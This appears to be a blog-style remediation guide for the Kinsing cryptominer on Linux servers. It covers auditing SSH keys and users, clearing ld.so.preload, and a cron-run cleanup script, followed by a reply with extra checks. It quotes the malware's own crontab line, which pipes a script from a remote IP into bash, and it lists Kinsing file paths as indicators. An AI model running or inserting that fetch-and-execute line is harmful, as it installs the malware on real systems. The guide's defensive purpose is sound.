Too many problem solver on the internet does not resolve the malware infection about kinsing. The kinsing malware also infected the network & listen into network port.
Check under the root ssh authorization
cat ~/.ssh/authorized_keys
Check it and search the unauthorized keys (if found), optional & recommended that check also another user ssh auth key.
Find the users that you dont know, check that user home directory is on another /home/ (except system user)
getent passwd | cut -d : -f 1 | xargs groupsCheck and make sure the auto_prepend_file getting empty (or filled by trusted sources)
grep -rnw 'auto_prepend_file' / --include=*.iniDo not delete the url of wget or curl command from kinsing malware, just comment it like. There are script checking about the crontab file
# your another crontab
# * * * * * curl http://185.122.204.197/cp.sh | bash > /dev/null 2>&1You should need add attribute to prevent crontab file change (but it will change if kinsing run) we just test it
chattr +i /var/spool/crontabs/rootCreate bash script about kinsing killer on the root path (use any file name eg: /root/killer-kin.sh)
Make sure net-utils / net-tools is installed and put the file into cron directory /etc/cron.d/killer-kin
MAILTO=''
# KILLER
* * * * * root /bin/bash /root/killer-kin.sh/root/killer-kin.sh executable script
#!/bin/bash
# ALSO TEST THE SSH STATUS
STATUS_SSH=$(pgrep ssh)
if [[ "${STATUS_SSH}" = "" ]]; then
echo "SSH STOPPED! STARTING";
/usr/bin/systemctl start ssh
else
echo "SSH RUNNING"
fi
# DELETE PRELOAD LD LIBRARY
echo '' > /etc/ld.so.preload
# BOT SERVICE IS KINSING SERVICE
/usr/bin/systemctl stop bot.service &>/dev/null
/usr/bin/systemctl disable bot.service &>/dev/null
# DELETE BOT SERVICE
echo '' > /lib/systemd/system/bot.service
# KILL THE KINSING FROM NETWORK
KINSING_PROC=$(netstat -tlp | grep kinsing | awk '/kinsing */ {split($NF,a,"/"); print a[1]}')
KDEV_PROC=$(netstat -tlp | grep kdevtmpfsi | awk '/kdevtmpfsi */ {split($NF,a,"/"); print a[1]}')
if [[ $KINSING_PROC =~ ^[0-9]+$ ]]; then
echo "KINSING FOUND IN NETWORK -> ${KINSING_PROC}";
kill $KINSING_PROC
fi
if [[ $KDEV_PROC =~ ^[0-9]+$ ]]; then
echo "KDEVTMPFSI FOUND IN NETWORK -> ${KDEV_PROC}";
kill $KDEV_PROC
fi
# KILL THE KINSING PROCESS
if [[ $(pgrep kdevtmpfsi) != "" ]];then
echo "MALWARE KDEV FOUND";
kill $(pgrep kdevtmp)
fi
if [[ $(pgrep kinsing) != "" ]]; then
echo "MALWARE KIN FOUND";
kill $(pgrep kinsing)
fi
# REMOVE KINSING FROM TMP & DATA DIRECTORY
echo "DELETING KIN"
rm -f /tmp/kdevtmpfsi* /tmp/kinsing* /var/tmp/kinsing* /var/tmp/kdevtmpfsi* /etc/data/kinsing /etc/data/libsystem.so
# LAST ... FIND KINSING FROM ANY DIRECTORY
# BUT THIS IS NOT WORTH WHEN RUNNING PER MINUTES
#find / -iname kdevtmpfsi* -exec rm -fv {} \;
#find / -iname kinsing* -exec rm -fv {} \;
Check the file /etc/ld.so.preload contain /etc/data/libsystem.so and commonly kinsing executable file in /etc/data/kinsing
- Kinsing executable file
/etc/data/kinsing - Kinsing library file
/etc/data/libsystem.soor/dev/shm/libsystem.so - Kinsing prevent watchdog to run, open the
/etc/sysctl.conf, appendingnmi_watchdog=0 - Temporary downloaded kinsing file
(/var)?/tmp/kinsing[0-9]+?&(/var)?/tmp/kdevtmpfsi[0-9]+?(regex)
Limit the files
- Edit
/etc/sysctl.confadd config that you need and then run :chattr +i /etc/sysctl.conf - create empty file to the
echo '' > /tmp/kinsing&echo '' > /tmp/kdevtmpfsithen runchattr +i /tmp/kinsing /tmp/kdevtmpfsi - overwrite kinsing & libsystem.so :
echo '' > /etc/data/kinsing&echo '' > /detc/data/libsystem.sothen runchattr +i /etc/data/kinsing /etc/data/libsystem.so
Recommended to make clean install or reinstall the server
Great but after that you manually need to check the following:
1 - no users under the root group ( other than the root user )
2 - check all ssh authorizations
3 - check php pre-load in php.in
I prefer you manually check the steps, I wrote a Reddit for that.
https://www.reddit.com/r/cyberpanel/comments/1gfw7fl/steps_to_remove_malware_from_ubuntu_server_after/